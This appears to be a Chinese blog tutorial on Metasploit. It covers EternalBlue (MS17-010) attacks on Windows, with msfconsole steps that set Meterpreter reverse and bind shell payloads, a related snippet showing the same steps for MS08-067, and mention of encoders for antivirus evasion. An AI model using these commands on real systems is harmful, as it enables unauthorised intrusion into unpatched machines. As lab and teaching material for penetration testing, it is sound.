MSF及Windows渗透测试

于 2024-08-09 23:17:29 发布
阅读量460 收藏 10
点赞数 18
文章标签: windows MSF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67812668/article/details/141072629
版权

一、Metasploit Framework原理

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。

Metasploit的设计初衷是打造成一个攻击工具开发平台,本书稍后将讲解如何开发攻击工具。然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。

这种可以扩展的模型将负载控制,编码器,无操作生成器和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。最新版本的 MSF 包含了二千多种流行的操作系统及应用软件的漏洞,以及几百个 shellcode 。作为安全工具,它在安全检测中用着不容忽视的作用,并为漏洞自动化探测和及时检测系统漏洞提供了有力保障。

Metasploit自带上百种漏洞,还可以在online exploit building demo(在线漏洞生成演示)上看到如何生成漏洞。这使自己编写漏洞变得更简单,它势必将提升非法shellcode的水平,并且扩大网络阴暗面。与其相似的专业漏洞工具,如Core Impact和Canvas已经被许多专业领域用户使用。Metasploit降低了使用的门槛,将其推广给大众。

Metasploit的目标是,永远支持开源软件,促进社区参与,并提供最具创新性的渗透测试人员在世界各地的资源和工具。除了探索商业解决方案,致力于保持免费和开源的Metasploit框架。

MSF 主要模块介绍

下图为metasploit的模块组成图:

Auxiliaries (辅助模块)

该模块不会直接在测试者和目标主机之间建立访问,它们只负责执行扫描、嗅探、指纹识别等相关功能以辅助渗透测试。

Exploit (漏洞利用模块)

漏洞利用是指由渗透测试者利用一个系统、应用或者服务中的安全漏洞进行的攻击行为。流行的渗透攻击技术包括缓冲区溢出、Web应用程序攻击,以及利用配置错误等,其中包含攻击者或测试人员针对系统中的漏洞而设计的各种POC验证程序,用于破坏系统安全性的攻击代码,每个漏洞都有相应的攻击代码。

Payload (攻击载荷模块)

攻击载荷是我们期望目标系统在被渗透攻击之后完成实际攻击功能的代码,成功渗透目标后,用于在目标系统上运行任意命令或者执行特定代码,在Metasploit框架中可以自由地选择、传送和植入。攻击载荷也可能是简单地在目标操作系统上执行一些命令,如添加用户账号等。

Post (后期渗透模块)

该模块主要用于在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息、实施跳板攻击等。

Encoders (编码工具模块)

该模块在渗透测试中负责免杀,以防止被杀毒软件、防火墙、IDS及类似的安全软件检测出来。

渗透攻击步骤

使用MSF渗透测试时,可以综合使用以上模块,对目标系统进行侦察并发动攻击,大致的步骤如下所示。

扫描目标机系统,寻找可用漏洞。

选择并配置一个漏洞利用模块。

选择并配置一个攻击载荷模块。

选择一个编码技术, 用来绕过杀毒软件的查杀。

渗透攻击。

启动MSF:

命令行输入如下命令即可启动:

#sudo msfdb init

#msfconsole

MS17-010漏洞介绍

当 Microsoft 服务器消息块 1.0 (SMBv1) 服务器处理某些请求时,存在多个远程执行代码漏洞。成功利用这些漏洞的攻击者可以获取在目标系统上执行代码的能力。

MS17-010即永恒之蓝,他的爆发源于WannaCry勒索病毒的诞生。

该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。

MS17-010漏洞攻击内网主机的类型

可以攻击的内网主机类型有:

  1. Win7-x86
  2. Win7-x64
  3. WinServer2003
  4. WinServer2008

MS17-010漏洞攻击方式

MS17-010是历来是内网兵家必争之地(没有新的漏洞发掘之前),常常通过它来进行横向的渗透。但是不同的目标主机,利用方式有差异,需要根据情况调整才能成功攻击目标主机。

攻击之前的内网扫描:

#nmap -v -sn 172.16.20.0/24

#nmap -A -T4 172.16.20.120

1.X64系统

漏洞探测方式:

use auxiliary/scanner/smb/smb_ms17_010

set rhosts  192.168.2.149(目标主机的IP地址)

漏洞利用方式/漏洞攻击方式:

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp  (默认)

或者: set payload windows/x64/meterpreter/bind_tcp  (容易被防火墙和杀软拦截)

set rhost 192.168.2.149

run

2.X86系统(32位系统)

漏洞探测方式:

use auxiliary/scanner/smb/smb_ms17_010

set rhosts  192.168.2.149(目标主机的IP地址)

漏洞利用方式/漏洞攻击方式:

use exploit/windows/smb/eternalblue_doublepulsar

show target

set payload windows/meterpreter/reverse_tcp

或者:set payload windows/meterpreter/bind_tcp  (容易被防火墙和杀软拦截)

set processinject explorer.exe

set rhost 192.168.2.136

run

3.WinServer2003(32位系统)

漏洞探测方式:
最低0.47元/天 解锁文章
卍king卐然
关注
  • 18
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MSF多种渗透测试实例合集
weixin_45380284的博客
03-05 3530
MSF多种渗透测试实例合集 声明:本文漏洞均为已发布漏洞,仅供学习实验,切勿违法使用,请自己搭建靶机进行学习。 1.(MS08-067)缓冲区溢出漏洞 漏洞简介: MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程履行代码。在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
- **msf渗透神器windows版**:指Metasploit Framework的Windows版本,适合在Windows操作系统上进行渗透测试。 - **MSFconsole**:Metasploit Framework的控制台界面,用户可以通过命令行进行各种操作,如创建、编辑...
msf完整渗透测试
clayzx的博客
11-15 6551
从生成shell到远程连接 前言: 本来是最近打算把时间都花在学c上,渗透目前跟着老师学以后研究,但为了后续上课需求,就必须把这个给拿下了,于是花了今天一天的时间都在研究这个,写一篇详细的实验结果,为了给自己做笔记,也为了刚学msfconsole提供一个资料参考。不说废话了,以下是我们这篇的目标: 1.生成shell 2.上shell 3.监听 4.拿到会话 5.提权 6.拿到密码 7.远程连接 首先此次实验需要准备一台kali的虚拟机和一台windows 7的
MSF模拟渗透测试攻击window实例
lza20001103的博客
04-06 4176
一次MSF模拟渗透测试攻击window实例
Kali利用msf渗透Windows电脑(超详细)
wholeliubei的博客
06-17 1637
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
利用MSF渗透windows系统,windows数据库,linux系统实验
Cwillchris的博客
10-18 1646
实验环境: kali:172.16.12.30 windows靶机:172.16.12.4 用户名:administrator 密码:vgrant centos靶机:172.16.12.11 用户名:root 密码:123 实验步骤: 一、攻击LINUX服务器 1、扫描目标机获取哪些服务和端口开启 ┌──(root????kali)-[~/desktop] └─# msfdb run msf6 > db_nmap -A -v 172.16.12.4 查看目标器服务列表
MSF实现远程渗透
WFC1006848997的博客
01-12 2539
MSF实现远程渗透 在本地测试腻了的小伙伴安耐不住,想耍耍远程的朋友,奈何不会msf远程渗透,服务器搭建也不会,那怎么办呢?今天笔者将分享一个让你本地的kali也能耍耍你远方的朋友,上才艺。 0x01环境准备 系统:Kali linux 工具:MSF、 Sunny-Ngrok 0x02环境部署 打开Sunny官网 (www.ngrok.cc),点击注册 完成注册登录,点击隧道管理,点击开通隧道,选择0元白嫖,当然你可以选择其他,笔者只能白嫖 可阅读,确认 隧道协议选择tcp,然后为你的隧道取个名称,选
msf攻击windows实例
qq_52712762的博客
05-30 1565
环境:攻击机kali(192.168.129.139),目标机windows10(192.168.129.132)方法一:通过web站点,使用无文件的方式攻击利用执行(命令执行漏洞)方法二:通过web站点,上传webshel,返回给msfmsfvenom)方法三:攻击其他端口服务,拿到meterpreter(445)
windows及centos安装MSF(Metasploit)
siu~
08-22 2292
windows及centos安装MSF
MSF渗透测试msfvenom提权
lza20001103的博客
04-04 962
MSF渗透测试msfvenom提权
一次完整的渗透测试流程
热门推荐
谢公子的博客
12-01 22万+
目录 渗透测试 信息收集 漏洞探测 漏洞利用 内网转发 内网渗透 痕迹清除 撰写渗透测试保告 渗透测试 渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵! 渗透测试的前提是我们得经过用户的授权,才可以对网站进行渗透。如果我...
71-71.渗透测试-Windows安装msf.mp4
05-10
71-71.渗透测试-Windows安装msf.mp4
渗透测试常用工具应用(PDF课件)
05-30
使用Armitage的MSF进行自动化集成渗透测试2.pdf 使用ferret进行Cookie劫持.pdf 使用SSHMitm中间人拦截SSH.pdf 使用Armitage的MSF进行自动化集成渗透测试.pdf 使用………… ……………… 使用vega对web进行漏洞扫描....
msf内网渗透
10-29
在IT安全领域,尤其是渗透测试和网络攻防中,“msf内网渗透”是一个关键话题,涉及到了Metasploit框架(简称MSF)在内部网络中的应用与实践。这一过程通常包括了渗透测试前的环境准备、利用MSF生成有效载荷、设置web...
SpringBoot基础 第一天
最新发布
2301_80034662的博客
08-05 577
Person类中利用ConfigurationProperties(prefix=" ")引入配置类中的元素 但是注意Person类中的类的名字必须与application.yaml中一致。如果不是标准的application.properties 是其他的Person类中需要用PropertySource来添加配置文件的路径。给容器中添加组件,将方法的返回值添加到容器中 容器中这个组件的默认ID就是方法名。的配置文件,我们自己编写的配置文件,也不能自动识别;的配置文件,让配置文件里面的内容生效;
Linux学习笔记:Linux基础知识汇总(个人复习版)
欢迎相互探讨交流知识呀~
08-05 1416
使用fdisk -l查看分区挂载情况,或者查看/etc/mtab文件,然后找到最接近的挂载点信息。4、创建站点主页 【eg.在/var/www/html内新建index.html】write_enable=YES//ftp可写,即上传权限;下载权限是默认赋予的。将数据同步写入硬盘中的指令,在关机之前输入,可以多输几次。使用df命令,如df -h,查看磁盘分区的挂载点。使用lsblk命令,查看系统的磁盘设备使用情况。-a:显示所有文件(包括隐藏文件),简洁版。-R:显示所有文件以及子目录下文件,简洁版。
C#中的foreach和自定义比较
weixin_64532720的博客
08-05 1886
在C#中,如果你想要使用自己定义的排序方式,你可以实现或IComparer接口,然后使用这个实现来自定义排序逻辑。以下是如何实现定义学生类set;set;​Age = age;实现 IComparer 接口// 根据年龄进行升序排序使用自定义比较器对集合进行排序​// 创建自定义比较器的实例​// 使用自定义比较器对集合进行排序如果你想要实现降序排序,可以在Compare// 根据年龄进行降序排序或者,你可以创建两个不同的比较器类,一个用于升序,一个用于降序。
【Python】列表元素排序:itertools.permutations()
持续更新中...
08-05 762
This tool returns successive r length permutations of elements in an iterable.If r is not specified or is None, then r defaults to the length of the iterable, and all possible full length permutations are generated.Permutations are printed in a lexicograph
msf渗透windows
10-10
了解,MSF(Metasploit Framework)可以用于渗透测试和漏洞利用,也可以用于攻击。在Windows系统中,可以使用MSF来获取对系统的访问权限和控制权。以下是一些基本步骤: 1. 确认目标IP地址 2. 选择合适的漏洞利用模块 3. 设置参数 4. 运行exploit 例如,使用ms08_067_netapi漏洞利用模块: 1. 确认目标机器的IP地址: ``` nmap -sS 192.168.0.0/24 ``` 2. 选择ms08_067_netapi漏洞利用模块: ``` use windows/smb/ms08_067_netapi ``` 3. 设置相关参数: ``` set RHOSTS 192.168.0.5 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.0.10 ``` 4. 运行exploit: ``` exploit ``` 以上步骤仅供参考,具体操作需要根据实际情况进行调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值